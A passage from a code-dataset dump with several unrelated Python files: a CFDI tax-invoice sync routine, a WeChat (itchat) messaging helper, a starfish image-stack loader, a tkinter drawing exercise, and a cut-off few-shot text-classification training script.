initialized == False:\n\t\t\tinitialization_log = _Locals.new_initialization_log(logger=process_logger)\n\t\t\t# Get CFDIs from DB:\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'RETRIEVING DATA FROM FOREST DB ... ')\n\t\t\t_year = str(initialization_data['year'])\n\t\t\t_month = str(initialization_data['month'])\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'Year: ' + str(initialization_data['year']) + ' Month: ' + str(initialization_data['month']))\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'From ' + str(initialization_data['begin_date']) + ' to ' + str(initialization_data['end_date']))\n\t\t\tcfdis_in_db = _Utilities.get_cfdis_in_forest_for_this_taxpayer_at_period(taxpayer,initialization_data['begin_date'],initialization_data['end_date'],limit=None)\n\t\t\t# Manage or format CFDis data:\n\t\t\texisting_cfdi_uuids = _Utilities.get_existing_uuids_in_forest_db(cfdis_in_db=cfdis_in_db,logger=process_logger)\n\t\t\t# Log Forest data:\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'Existing: ' + str(len(existing_cfdi_uuids)))\n\t\t\t# Get CFDIs from firmware:\n\t\t\tget_sat_updates_params = {\n\t\t\t\t'identifier' : taxpayer['identifier'],\n\t\t\t\t'password' : taxpayer['password'],\n\t\t\t\t'year' : initialization_data['year'],\n\t\t\t\t'months' : [initialization_data['month']],\n\t\t\t\t'uuids' : existing_cfdi_uuids\n\t\t\t}# End of get_sat_update_params\n\t\t\t# -------------------------------------------------------------------\n\t\t\t# bugSolved 12/Ago/15 \n\t\t\t# Event: timeout value was becoming longer and longer because of connection problems (firmware servers could not be reached due to connection problems instead of logic problems)\n\t\t\t# firmware_timeout = taxpayer['firmware_timeout'] if 'firmware_timeout' in taxpayer and taxpayer['firmware_timeout'] is not None else _Constants.DEFAULT_FIRMWARE_TIMEOUT\n\t\t\tfirmware_timeout = _Constants.DEFAULT_FIRMWARE_TIMEOUT\n\t\t\t# -------------------------------------------------------------------\n\t\t\t# process_logger.info(2*LOG_INDENT + 'RETRIEVING DATA FROM FIRMWARE (SAT) constant timeout = ' + str(firmware_timeout) + ' secs')\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'RETRIEVING DATA FROM FIRMWARE (SAT)')\n\t\t\tsat_updates = _Firmware.isa(instruction='get_sat_updates',params=get_sat_updates_params,log=initialization_log,logger=process_logger,timeout=firmware_timeout,taxpayer=taxpayer)\n\t\t\tnew_cfdis = sat_updates['new']\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'CFDI new: ' + str(initialization_log['firmware']['new']))\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'CFDI to-update: ' + str(initialization_log['firmware']['update']))\n\t\t\t# Update Forest DB -> NEW OR COMPLETED:\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'UPDATING FOREST DB ... ')\n\t\t\tn = 0\n\t\t\tforest_db = _Utilities.set_connection_to_forest_db()\n\t\t\tfor new_cfdi in new_cfdis:\n\t\t\t\ttry:\n\t\t\t\t\tuuid = new_cfdi['uuid']\n\t\t\t\t\t_Utilities.create_cfdi(new_cfdi,logger=process_logger,log=initialization_log,forest_db=forest_db)\n\t\t\t\t\tn = n + 1\n\t\t\t\t\tprocess_logger.info(3*LOG_INDENT + str(n) + '. ' + uuid + ' stored in Forest DB')\n\t\t\t\texcept:\n\t\t\t\t\tprocess_logger.info(3*LOG_INDENT + str(n) + '. ' + uuid + ' could not be stored in Forest DB (ERROR)')\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'SUMMARY ... ')\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'New stored: ' + str(initialization_log['forest_db']['after']['new']))\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'Pending: ' + str(initialization_log['forest_db']['after']['pending']))\n\t\t\tinitialization_result = {\n\t\t\t\t'new' : initialization_log['firmware']['new'],\n\t\t\t\t'stored' : initialization_log['forest_db']['after']['new'],\n\t\t\t\t'year_initialized' : initialization_data['year'],\n\t\t\t\t'month_initialized' : initialization_data['month'],\n\t\t\t\t'avoid_iteration' : initialization_log['avoid_iteration'] if 'avoid_iteration' in initialization_log else False\n\t\t\t}# End of initialization_result\n\t\telse:\n\t\t\tinitialization_result = {\n\t\t\t\t'new' : _Constants.ZLATAN,\n\t\t\t\t'stored' : _Constants.ZLATAN,\n\t\t\t\t'year_initialized' : _Constants.ZLATAN,\n\t\t\t\t'month_initialized' : _Constants.ZLATAN\n\t\t\t}# End of initialization_result\n\t\t# Update taxpayer:\n\t\tnew_initialization_data = initialization_data['new_initialization_data']\n\t\tinitialization_result['initialized'] = initialized\n\t\tif forcing_period or ('avoid_iteration' in initialization_result and initialization_result['avoid_iteration'] == True):\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'NOT updating taxpayer initialization status ... ')\n\t\t\tinitialization_result['percentage_initialized'] = \"--.-%\"\n\t\telse:\n\t\t\ttaxpayer = _Locals.update_taxpayer_initialization_status(taxpayer,new_initialization_data,logger=process_logger,initialized=initialized)\n\t\t\tinitialization_result['percentage_initialized'] = taxpayer['data']['percentage_initialized']\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'Percentage initialized: ' + str(initialization_result['percentage_initialized']))\n\t\tif forcing_execution:\n\t\t\tprocess_logger.info(3*LOG_INDENT + 'Sending telegram notification ... ')\n\t\t\tmessage = 'Ya inicialice a este vato: ' + taxpayer['identifier'] + ' para el periodo ' + _month + '/' + _year\n\t\t\t_Utilities.send_message_to_forest_telegram_contacts(message,logger=process_logger)\n\t\treturn initialization_result\n\texcept Already_Handled_Exception as already_handled_exception:\n\t\traise already_handled_exception\n\texcept Exception as e:\n\t\tprocess_logger.critical(e.message)\n\t\talready_handled_exception = Already_Handled_Exception(e.message)\n\t\traise already_handled_exception\n","sub_path":"Processes/Initialization/initialization.py","file_name":"initialization.py","file_ext":"py","file_size_in_byte":13853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"389718353","text":"import itchat\nfrom app.constants import WxConstants, HttpConstants as httpconstants\nfrom app.util import HttpUtils as httputils\n\n\n# 查询是否添加该微信号\ndef is_friend(nick_name):\n friend_lists = itchat.search_friends(nickName=nick_name)\n if friend_lists is None or len(friend_lists) < 1:\n return False\n return True\n\n\n# 添加好友的请求\ndef add_friend(user_name, verify_content):\n content = verify_content\n if verify_content is None:\n content = WxConstants.VERIFY_CONTENT.format(user_name)\n is_success = itchat.add_friend(userName=user_name, verifyContent=content)\n print(is_success)\n return is_success\n\n\n# 退出登录重连\ndef keep_login():\n itchat.auto_login(hotReload=True)\n\n\n# 统一发送消息接口\ndef send_message(wx_id, message, is_jump):\n if itchat.check_login != 200:\n try:\n keep_login()\n except:\n return httputils.fail(\"登录异常\")\n friends = itchat.search_friends(remarkName=wx_id)\n if friends is None or len(friends) < 1:\n return httputils.fail(httpconstants.NOT_FOUND_FRIENDS)\n send_resp = friends[0].send(message)\n print(send_resp)\n is_send_success = (send_resp is not None and send_resp['BaseResponse']['Ret'] == 0)\n print('success = ' + str(is_send_success))\n if is_send_success and is_jump == '1':\n image_result = send_image(friend=friends[0])\n if image_result is not None and image_result['BaseResponse']['Ret'] == 0:\n return httputils.ok()\n else:\n return httputils.fail(image_result['BaseResponse']['ErrMsg'])\n elif is_send_success and is_jump == '0':\n return httputils.ok()\n else:\n return httputils.fail(send_resp['BaseResponse']['ErrMsg'])\n\n\n# 发送小程序的二维码\ndef send_image(friend, image=None):\n if image is None:\n image = httpconstants.JUMP_IMAGE_PATH\n return itchat.send_image(image, toUserName=friend['UserName'])\n\n\n# 向某个好友发送消息\n# def send_message(user_name, message):\n# if itchat.check_login is not 200:\n# keep_login()\n# friends = itchat.search_friends(nickName=user_name)\n# send_resp = friends[0].send(message)\n# print(str(send_resp))\n# if send_resp and send_resp['BaseResponse']['Ret'] == 0:\n# return httputils.ok()\n# else:\n# return httputils.fail(send_resp.BaseResponse.ErrMsg)\n\n\n# 查找好友\ndef find_firends(nick_name):\n return itchat.search_friends(nickName=nick_name)\n\n\n# 群发接口\ndef send_batch_message(user_lists, message_template):\n for user_name in user_lists:\n send_message(user_name, message_template.format(user_name))\n","sub_path":"app/util/WxchatUtils.py","file_name":"WxchatUtils.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"313878069","text":"import json\nimport os\nfrom typing import Optional, Mapping\n\nimport numpy as np\nfrom slicedimage import TileSet, Tile\nfrom slicedimage.io import resolve_path_or_url\n\nfrom starfish.constants import Coordinates, Indices\nfrom .image import ImageStack\n\n\nclass Stack:\n\n def __init__(self):\n # data organization\n self.org = None\n self.image = None\n\n # auxiliary images\n self.auxiliary_images = dict()\n\n # readers and writers\n self.write_fn = np.save # asserted for now\n\n # backend & baseurl\n self.backend = None\n self.baseurl = None\n\n @classmethod\n def from_data(cls, image_stack: ImageStack, aux_dict: Optional[Mapping[str, ImageStack]]=None) -> \"Stack\":\n \"\"\"create a Stack from an already-loaded ImageStack\n\n Parameters\n ----------\n image_stack : ImageStack\n in-memory ImageStack\n aux_dict : Optional[Mapping[str, ImageStack]]\n a dictionary of ImageStacks, default None\n\n Returns\n -------\n Stack :\n a Stack object\n\n \"\"\"\n stack = cls()\n stack.image = image_stack\n stack.auxiliary_images = aux_dict if aux_dict is not None else dict()\n return stack\n\n def read(self, in_json_path_or_url):\n self.backend, name, self.baseurl = resolve_path_or_url(in_json_path_or_url)\n with self.backend.read_file_handle(name) as fh:\n self.org = json.load(fh)\n\n self.image = ImageStack.from_url(self.org['hybridization_images'], self.baseurl)\n for aux_key, aux_data in self.org['auxiliary_images'].items():\n self.auxiliary_images[aux_key] = ImageStack.from_url(aux_data, self.baseurl)\n\n @classmethod\n def from_experiment_json(cls, json_url: str) -> \"Stack\":\n \"\"\"Construct a `Stack` from an experiment.json file format specifier\n\n Parameters\n ----------\n json_url : str\n file path or web link to an experiment.json file\n\n Returns\n -------\n Stack :\n Stack object serving the requested image data\n\n \"\"\"\n stack: Stack = cls()\n stack.read(json_url)\n return stack\n","sub_path":"starfish/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"581591144","text":"# reproduce this:\n# [https://github.com/greenfox-academy/teaching-materials/blob/master/workshop/drawing/purple-steps-3d/r4.png]\n# purple_square(10,10,25,25)\n\nfrom tkinter import *\n\nroot = Tk()\ncanvas = Canvas(root, width='300', height='300')\ncanvas.pack()\n\n\ndef purple_cubics():\n x_coordinate = 0\n y_coordinate = 0\n size = 15\n for i in range(1, 20):\n square = canvas.create_rectangle(x_coordinate, y_coordinate, x_coordinate + size, y_coordinate + size, fill=\"red\") # nopep8\n x_coordinate = x_coordinate + size\n y_coordinate = y_coordinate + size\n size += 10\n\n\npurple_cubics()\nroot.mainloop()\n","sub_path":"week-03/day-03/purple_steps_3D.py","file_name":"purple_steps_3D.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288345873","text":"import os\r\nimport pickle\r\nimport time\r\nimport copy\r\nimport numpy as np\r\n\r\nfrom classifier.classifier_getter import get_classifier\r\nfrom tools.tool import parse_args, print_args, set_seed\r\n# from tools.visualization import Print_Attention\r\nimport dataset.loader as loader\r\nimport datetime\r\nfrom embedding.wordebd import WORDEBD\r\nimport torch\r\nimport torch.nn as nn\r\nfrom embedding.rnn import RNN\r\nimport torch.nn.functional as F\r\nfrom train.utils import grad_param, get_norm\r\nfrom dataset.sampler2 import SerialSampler, task_sampler\r\nfrom dataset import utils\r\nfrom tools.tool import neg_dist, pos_dist, reidx_y\r\nfrom tqdm import tqdm\r\nfrom termcolor import colored\r\nfrom torch import autograd\r\nfrom collections import OrderedDict\r\n\r\nimport sys\r\n\r\n\r\ndef zero_grad(params):\r\n for p in params:\r\n if p.grad is not None:\r\n p.grad.zero_()\r\n\r\n\r\ndef del_tensor_ele(arr, index):\r\n arr1 = arr[0:index]\r\n arr2 = arr[index + 1:]\r\n return torch.cat((arr1, arr2), dim=0)\r\n\r\n\r\ndef pre_calculate(train_data, class_names, net, args):\r\n with torch.no_grad():\r\n all_classes = np.unique(train_data['label'])\r\n num_classes = len(all_classes)\r\n\r\n # 生成sample类时候的概率矩阵\r\n train_class_names = {}\r\n train_class_names['text'] = class_names['text'][all_classes]\r\n train_class_names['text_len'] = class_names['text_len'][all_classes]\r\n train_class_names['label'] = class_names['label'][all_classes]\r\n train_class_names = utils.to_tensor(train_class_names, args.cuda)\r\n train_class_names_ebd = net.ebd(train_class_names) # [10, 36, 300]\r\n train_class_names_ebd = torch.sum(train_class_names_ebd, dim=1) / train_class_names['text_len'].view((-1, 1)) # [10, 300]\r\n dist_metrix = -neg_dist(train_class_names_ebd, train_class_names_ebd) # [10, 10]\r\n\r\n for i, d in enumerate(dist_metrix):\r\n if i == 0:\r\n dist_metrix_nodiag = del_tensor_ele(d, i).view((1, -1))\r\n else:\r\n dist_metrix_nodiag = torch.cat((dist_metrix_nodiag, del_tensor_ele(d, i).view((1, -1))), dim=0)\r\n\r\n prob_metrix = F.softmax(dist_metrix_nodiag, dim=1) # [10, 9]\r\n prob_metrix = prob_metrix.cpu().numpy()\r\n\r\n\r\n # 生成sample样本时候的概率矩阵\r\n example_prob_metrix = []\r\n for i, label in enumerate(all_classes):\r\n train_examples = {}\r\n train_examples['text'] = train_data['text'][train_data['label'] == label]\r\n train_examples['text_len'] = train_data['text_len'][train_data['label'] == label]\r\n train_examples['label'] = train_data['label'][train_data['label'] == label]\r\n train_examples = utils.to_tensor(train_examples, args.cuda)\r\n train_examples_ebd = net.ebd(train_examples)\r\n train_examples_ebd = torch.sum(train_examples_ebd, dim=1) / train_examples['text_len'].view(\r\n (-1, 1)) # [N, 300]\r\n example_prob_metrix_one = -neg_dist(train_class_names_ebd[i].view((1, -1)), train_examples_ebd)\r\n example_prob_metrix_one = F.softmax(example_prob_metrix_one, dim=1) # [1, 1000]\r\n example_prob_metrix_one = example_prob_metrix_one.cpu().numpy()\r\n example_prob_metrix.append(example_prob_metrix_one)\r\n\r\n return prob_metrix, example_prob_metrix\r\n\r\n\r\ndef get_embedding(vocab, args):\r\n print(\"{}, Building embedding\".format(\r\n datetime.datetime.now()), flush=True)\r\n\r\n ebd = WORDEBD(vocab, args.finetune_ebd)\r\n\r\n modelG = ModelG(ebd, args)\r\n # modelD = ModelD(ebd, args)\r\n\r\n print(\"{}, Building embedding\".format(\r\n datetime.datetime.now()), flush=True)\r\n\r\n if args.cuda != -1:\r\n modelG = modelG.cuda(args.cuda)\r\n # modelD = modelD.cuda(args.cuda)\r\n return modelG # , modelD\r\n else:\r\n return modelG # , modelD\r\n\r\n\r\ndef dis_to_level(dis):\r\n tmp_mean = torch.mean(dis, dim=-1, keepdim=True)\r\n result = dis / tmp_mean\r\n return -result\r\n\r\nclass ModelG(nn.Module):\r\n\r\n def __init__(self, ebd, args):\r\n super(ModelG, self).__init__()\r\n\r\n self.args = args\r\n\r\n self.ebd = ebd\r\n self.ebd_begin_len = args.ebd_len\r\n\r\n self.ebd_dim = self.ebd.embedding_dim\r\n self.hidden_size = 128\r\n\r\n # Text CNN\r\n ci = 1 # input chanel size\r\n kernel_num = args.kernel_num # output chanel size\r\n kernel_size = args.kernel_size\r\n dropout = args.dropout\r\n self.conv11 = nn.Conv2d(ci, kernel_num, (kernel_size[0], self.ebd_dim))\r\n self.conv12 = nn.Conv2d(ci, kernel_num, (kernel_size[1], self.ebd_dim))\r\n self.conv13 = nn.Conv2d(ci, kernel_num, (kernel_size[2], self.ebd_dim))\r\n self.dropout = nn.Dropout(dropout)\r\n self.fc = nn.Linear(len(kernel_size) * kernel_num, 64)\r\n self.cost = nn.CrossEntropyLoss()\r\n\r\n def forward_once(self, data):\r\n\r\n ebd = self.ebd(data) # [b, text_len, 300]\r\n # if data['text_len'][0] < 60:\r\n # ebd = ebd[:, :self.ebd_begin_len, :]\r\n ebd = ebd[:, :self.ebd_begin_len, :]\r\n ebd = ebd.unsqueeze(1) # [b, 1, text_len, 300]\r\n\r\n x1 = self.conv11(ebd) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x1.shape)\r\n x1 = F.relu(x1.squeeze(3)) # [b, kernel_num, H_out]\r\n x1 = F.max_pool1d(x1, x1.size(2)).squeeze(2) # [batch, kernel_num]\r\n\r\n x2 = self.conv12(ebd) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x2.shape)\r\n x2 = F.relu(x2.squeeze(3)) # [b, kernel_num, H_out]\r\n x2 = F.max_pool1d(x2, x2.size(2)).squeeze(2) # [batch, kernel_num]\r\n\r\n x3 = self.conv13(ebd) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x3.shape)\r\n x3 = F.relu(x3.squeeze(3)) # [b, kernel_num, H_out]\r\n x3 = F.max_pool1d(x3, x3.size(2)).squeeze(2) # [b, kernel_num]\r\n\r\n x = torch.cat((x1, x2, x3), 1) # [b, 3 * kernel_num]\r\n # x = self.dropout(x)\r\n\r\n x = self.fc(x) # [b, 128]\r\n x = self.dropout(x)\r\n\r\n return x\r\n\r\n def forward_once_with_param(self, data, param):\r\n\r\n ebd = self.ebd(data) # [b, text_len, 300]\r\n # if data['text_len'][0] < 60:\r\n # ebd = ebd[:, :self.ebd_begin_len, :]\r\n ebd = ebd.unsqueeze(1) # [b, 1, text_len, 300]\r\n\r\n w1, b1 = param['conv11']['weight'], param['conv11']['bias']\r\n x1 = F.conv2d(ebd, w1, b1) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x1.shape)\r\n x1 = F.relu(x1.squeeze(3)) # [b, kernel_num, H_out]\r\n x1 = F.max_pool1d(x1, x1.size(2)).squeeze(2) # [batch, kernel_num]\r\n\r\n w2, b2 = param['conv12']['weight'], param['conv12']['bias']\r\n x2 = F.conv2d(ebd, w2, b2) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x2.shape)\r\n x2 = F.relu(x2.squeeze(3)) # [b, kernel_num, H_out]\r\n x2 = F.max_pool1d(x2, x2.size(2)).squeeze(2) # [batch, kernel_num]\r\n\r\n w3, b3 = param['conv13']['weight'], param['conv13']['bias']\r\n x3 = F.conv2d(ebd, w3, b3) # [b, kernel_num, H_out, 1]\r\n # print(\"conv11\", x3.shape)\r\n x3 = F.relu(x3.squeeze(3)) # [b, kernel_num, H_out]\r\n x3 = F.max_pool1d(x3, x3.size(2)).squeeze(2) # [b, kernel_num]\r\n\r\n x = torch.cat((x1, x2, x3), 1) # [b, 3 * kernel_num]\r\n # x = self.dropout(x)\r\n\r\n w_fc, b_fc = param['fc']['weight'], param['fc']['bias']\r\n x = F.linear(x, w_fc, b_fc) # [b, 128]\r\n x = self.dropout(x)\r\n\r\n return x\r\n\r\n def forward(self, inputs_1, inputs_2, param=None):\r\n if param is None:\r\n out_1 = self.forward_once(inputs_1)\r\n out_2 = self.forward_once(inputs_2)\r\n else:\r\n out_1 = self.forward_once_with_param(inputs_1, param)\r\n out_2 = self.forward_once_with_param(inputs_2, param)\r\n return out_1, out_2\r\n\r\n def cloned_fc_dict(self):\r\n return {key: val.clone() for key, val in self.fc.state_dict().items()}\r\n\r\n def cloned_conv11_dict(self):\r\n return {key: val.clone() for key, val in self.conv11.state_dict().items()}\r\n\r\n def cloned_conv12_dict(self):\r\n return {key: val.clone() for key, val in self.conv12.state_dict().items()}\r\n\r\n def cloned_conv13_dict(self):\r\n return {key: val.clone() for key, val in self.conv13.state_dict().items()}\r\n\r\n def loss(self, logits, label):\r\n loss_ce = self.cost(logits, label)\r\n return loss_ce\r\n\r\n def accuracy(self, pred, label):\r\n '''\r\n pred: Prediction results with whatever size\r\n label: Label with whatever size\r\n return: [Accuracy] (A single value)\r\n '''\r\n return torch.mean((pred.view(-1) == label).type(torch.FloatTensor))\r\n\r\n\r\n\r\n# 自定义ContrastiveLoss\r\nclass ContrastiveLoss(torch.nn.Module):\r\n \"\"\"\r\n Contrastive loss function.\r\n Based on: http://yann.lecun.com/exdb/publis/pdf/hadsell-chopra-lecun-06.pdf\r\n \"\"\"\r\n\r\n def __init__(self, margin=2.0):\r\n super(ContrastiveLoss, self).__init__()\r\n self.margin = margin\r\n\r\n def forward(self, output1, output2, label, weight):\r\n euclidean_distance = F.pairwise_distance(output1, output2, keepdim=True)\r\n euclidean_distance = euclidean_distance / torch.mean(euclidean_distance)\r\n\r\n tmp1 = (label) * torch.pow(euclidean_distance, 2).squeeze(-1)\r\n # mean_val = torch.mean(euclidean_distance)\r\n tmp2 = (1 - label) * torch.pow(torch.clamp(self.margin - euclidean_distance, min=0.0),\r\n 2).squeeze(-1)\r\n loss_contrastive = torch.mean((tmp1 + tmp2)*weight)\r\n\r\n # print(\"**********************************************************************\")\r\n return loss_contrastive\r\n\r\n\r\n\r\ndef get_weight_of_test_support(support, query, args):\r\n if len(support) > args.way*args.shot:\r\n support = support[0:args.way*args.shot]\r\n result = torch.cat( (torch.ones([args.way*args.shot*args.way]), args.test_loss_weight*torch.ones([args.way*args.way])),0 )\r\n\r\n tensor_shape = support.shape[-1]\r\n for each_way in range(args.way):\r\n this_support = support[each_way*args.shot:each_way*args.shot+args.shot]\r\n this_query = query[each_way*args.query:each_way*args.query+args.query]\r\n all_dis = torch.ones([args.shot])\r\n new_support = torch.ones([args.query,tensor_shape])\r\n for each_shot in range(args.shot):\r\n new_support[:] = this_support[each_shot]\r\n new_support = new_support.cuda(args.cuda)\r\n this_dis = F.pairwise_distance(new_support, this_query, keepdim=True)\r\n this_dis = torch.mean(this_dis)\r\n all_dis[each_shot] = this_dis\r\n probab = dis_to_level(all_dis)\r\n probab = F.softmax(probab, dim = -1)\r\n probab = 5*probab\r\n for each_shot in range(args.shot):\r\n begin = each_way*(args.shot*args.way)+each_shot*args.way\r\n result[begin:begin+args.way] = probab[each_shot]\r\n\r\n if args.cuda != -1:\r\n result = result.cuda(args.cuda)\r\n return result\r\n\r\n\r\ndef train_one(task, class_names, model, optG, criterion, args, grad):\r\n '''\r\n Train the model on one sampled task.\r\n '''\r\n model['G'].train()\r\n # model['G2'].train()\r\n # model['clf'].train()\r\n\r\n support, query = task\r\n # print(\"support, query:\", support, query)\r\n # print(\"class_names_dict:\", class_names_dict)\r\n\r\n '''分样本对'''\r\n YS = support['label']\r\n YQ = query['label']\r\n\r\n sampled_classes = torch.unique(support['label']).cpu().numpy().tolist()\r\n # print(\"sampled_classes:\", sampled_classes)\r\n\r\n class_names_dict = {}\r\n class_names_dict['label'] = class_names['label'][sampled_classes]\r\n # print(\"class_names_dict['label']:\", class_names_dict['label'])\r\n class_names_dict['text'] = class_names['text'][sampled_classes]\r\n class_names_dict['text_len'] = class_names['text_len'][sampled_classes]\r\n class_names_dict['is_support'] = False\r\n class_names_dict = utils.to_tensor(class_names_dict, args.cuda, exclude_keys=['is_support'])\r\n\r\n YS, YQ = reidx_y(args, YS, YQ)\r\n # print('YS:', support['label'])\r\n # print('YQ:', query['label'])\r\n # print(\"class_names_dict:\", class_names_dict['label'])\r\n\r\n \"\"\"维度填充\"\"\"\r\n if support['text'].shape[1] > class_names_dict['text'].shape[1]:\r\n zero = torch.zeros(\r\n (class_names_dict['text'].shape[0], support['text'].shape[1] - class_names_dict['text'].shape[1]),\r\n dtype=torch.long)\r\n class_names_dict['text'] = torch.cat((class_names_dict['text'], zero.cuda()), dim=-1)\r\n elif support['text'].shape[1] < class_names_dict['text'].shape[1]:\r\n zero = torch.zeros(\r\n (support['text'].shape[0], class_names_dict['text'].shape[1] - support['text'].shape[1]),\r\n dtype=torch.long)\r\n support['text'] = torch.cat((support['text'], zero.cuda()), dim=-1)\r\n\r\n support['text'] = torch.cat((support['text'], class_names_dict['text']), dim=0)\r\n support['text_len'] = torch.cat((support['text_len'], class_names_dict['text_len']), dim=0)\r\n support['label'] = torch.cat((support['label'], class_names_dict['label']), dim=0)\r\n # print(\"support['text']:\", support['text'].shape)\r\n # print(\"support['label']:\", support['label'])\r\n\r\n text_sample_len = support['text'].shape[0]\r\n # print(\"support['text'].shape[0]:\", support['text'].shape[0])\r\n support['text_1'] = support['text'][0].view((1, -1))\r\n support['text_len_1'] = support['text_len'][0].view(-1)\r\n support['label_1'] = support['label'][0].view(-1)\r\n for i in range(text_sample_len):\r\n if i == 0:\r\n for j in range(1, len(sampled_classes)):\r\n support['text_1'] = torch.cat((support['text_1'], support['text'][i].view((1, -1))), dim=0)\r\n support['text_len_1'] = torch.cat((support['text_len_1'], support['text_len'][i].view(-1)), dim=0)\r\n support['label_1'] = torch.cat((support['label_1'], support['label'][i].view(-1)), dim=0)\r\n else:\r\n for j in range(len(sampled_classes)):\r\n support['text_1'] = torch.cat((support['text_1'], support['text'][i].view((1, -1))), dim=0)\r\n support['text_len_1'] = torch.cat((support['text_len_1'], support['text_len'][i].view(-1)), dim=0)\r\n support['label_1'] = torch.cat((support['label_1'], support['label'][i].view(-1)), dim=0)\r\n\r\n support['text_2'] = class_names_dict['text'][0].view((1, -1))\r\n support['text_len_2'] = class_names_dict['text_len'][0].view(-1)\r\n support['label_2'] = class_names_dict['label'][0].view(-1)\r\n for i in range(text_sample_len):\r\n if i == 0:\r\n for j in range(1, len(sampled_classes)):\r\n support['text_2'] = torch.cat((support['text_2'], class_names_dict['text'][j].view((1, -1))), dim=0)\r\n support['text_len_2'] = torch.cat((support['text_len_2'], class_names_dict['text_len'][j].view(-1)),dim=0)\r\n support['label_2'] = torch.cat((support['label_2'], class_names_dict['label'][j].view(-1)), dim=0)\r\n else:\r\n for j in range(len(sampled_classes)):\r\n support['text_2'] = torch.cat((support['text_2'], class_names_dict['text'][j].view((1, -1))), dim=0)\r\n support['text_len_2'] = torch.cat((support['text_len_2'], class_names_dict['text_len'][j].view(-1)),dim=0)\r\n support['label_2'] = torch.cat((support['label_2'], class_names_dict['label'][j].view(-1)), dim=0)\r\n\r\n # print(\"support['text_1']:\", support['text_1'].shape, support['text_len_1'].shape, support['label_1'].shape)\r\n # print(\"support['text_2']:\", support['text_2'].shape, support['text_len_2'].shape, support['label_2'].shape)\r\n support['label_final'] = support['label_1'].eq(support['label_2']).int()\r\n\r\n support_1 = {}\r\n support_1['text'] = support['text_1']\r\n support_1['text_len'] = support['text_len_1']\r\n support_1['label'] = support['label_1']\r\n\r\n support_2 = {}\r\n support_2['text'] = support['text_2']\r\n support_2['text_len'] = support['text_len_2']\r\n support_2['label'] = support['label_2']\r\n\r\n\r\n\r\n '''first step'''\r\n S_out1, S_out2 = model['G'](support_1, support_2)\r\n # print(\"-------0S1_2:\", S_out1.shape, S_out2.shape)\r\n\r\n # supp_, que_ = model['G'](support, query)\r\n # loss_weight = get_weight_of_support(supp_, que_, args)\r\n\r\n loss_weight = torch.cat(\r\n (torch.ones([args.way * args.shot * args.way]), args.train_loss_weight * torch.ones([args.way * args.way])), 0)\r\n if args.cuda != -1:\r\n loss_weight = loss_weight.cuda(args.cuda)\r\n\r\n loss = criterion(S_out1, S_out2, support['label_final'], loss_weight)\r\n # print(\"**********loss first step*******\", loss)\r\n # print(\"s_1_loss:\", loss)\r\n zero_grad(model['G'].parameters())\r\n\r\n grads_fc = autograd.grad(loss, model['G'].fc.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_fc, orderd_params_fc = model['G'].cloned_fc_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].fc.named_parameters(), grads_fc):\r\n fast_weights_fc[key] = orderd_params_fc[key] = val - args.task_lr * grad\r\n\r\n grads_conv11 = autograd.grad(loss, model['G'].conv11.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_conv11, orderd_params_conv11 = model['G'].cloned_conv11_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv11.named_parameters(), grads_conv11):\r\n fast_weights_conv11[key] = orderd_params_conv11[key] = val - args.task_lr * grad\r\n\r\n grads_conv12 = autograd.grad(loss, model['G'].conv12.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_conv12, orderd_params_conv12 = model['G'].cloned_conv12_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv12.named_parameters(), grads_conv12):\r\n fast_weights_conv12[key] = orderd_params_conv12[key] = val - args.task_lr * grad\r\n\r\n grads_conv13 = autograd.grad(loss, model['G'].conv13.parameters(), allow_unused=True)\r\n fast_weights_conv13, orderd_params_conv13 = model['G'].cloned_conv13_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv13.named_parameters(), grads_conv13):\r\n fast_weights_conv13[key] = orderd_params_conv13[key] = val - args.task_lr * grad\r\n\r\n fast_weights = {}\r\n fast_weights['fc'] = fast_weights_fc\r\n fast_weights['conv11'] = fast_weights_conv11\r\n fast_weights['conv12'] = fast_weights_conv12\r\n fast_weights['conv13'] = fast_weights_conv13\r\n\r\n '''steps remaining'''\r\n for k in range(args.train_iter - 1):\r\n S_out1, S_out2 = model['G'](support_1, support_2, fast_weights)\r\n # print(\"-------1S1_2:\", S_out1, S_out2)\r\n # supp_, que_ = model['G'](support, query, fast_weights)\r\n # loss_weight = get_weight_of_support(supp_, que_, args)\r\n\r\n loss_weight = torch.cat(\r\n (torch.ones([args.way * args.shot * args.way]), args.train_loss_weight * torch.ones([args.way * args.way])),\r\n 0)\r\n if args.cuda != -1:\r\n loss_weight = loss_weight.cuda(args.cuda)\r\n\r\n loss = criterion(S_out1, S_out2, support['label_final'], loss_weight)\r\n # print(\"**********loss remain step*******\", loss)\r\n # print(\"train_iter: {} s_loss:{}\".format(k, loss))\r\n zero_grad(orderd_params_fc.values())\r\n zero_grad(orderd_params_conv11.values())\r\n 